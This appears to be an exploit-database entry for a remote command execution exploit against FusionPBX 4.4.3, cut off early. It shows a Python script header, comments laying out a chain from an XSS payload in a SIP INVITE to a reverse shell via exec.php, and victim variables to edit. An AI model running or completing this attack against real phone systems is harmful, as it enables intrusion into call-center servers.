Exploits / Vulnerability Discovered : 2019-06-12 |
Type : webapps |
Platform : php
This exploit / vulnerability Fusionpbx 4.4.3 remote command execution is for educational purposes only and if it is used you will do on your own risk!
#!/usr/bin/python
import socket, sys
from random import randint
from hashlib import md5
# Exploitation steps:
#
# 1. First, encode an XSS payload that will be injected into the
# “Caller ID Number” field, or “User” component of the SIP
# “From” URI.
# 2. Connect to external SIP profile port and send a SIP INVITE
# packet with XSS payload injected into the From Field.
# 3. XSS payload will fire operator panel screen (CVE-2019-11408), which
# is designed to be monitored constantly by a call center operator.
# 4. Once XSS code executes, a call is made to the exec.php script
# (CVE-2019-11409) with a reverse shell payload that connects back to
# a netcat listener on the attacker system.
# edit these variables to set up attack
victim_addr="10.10.10.10"
victim_host="victim-pbx1.example.com"
victim_num="12125551212"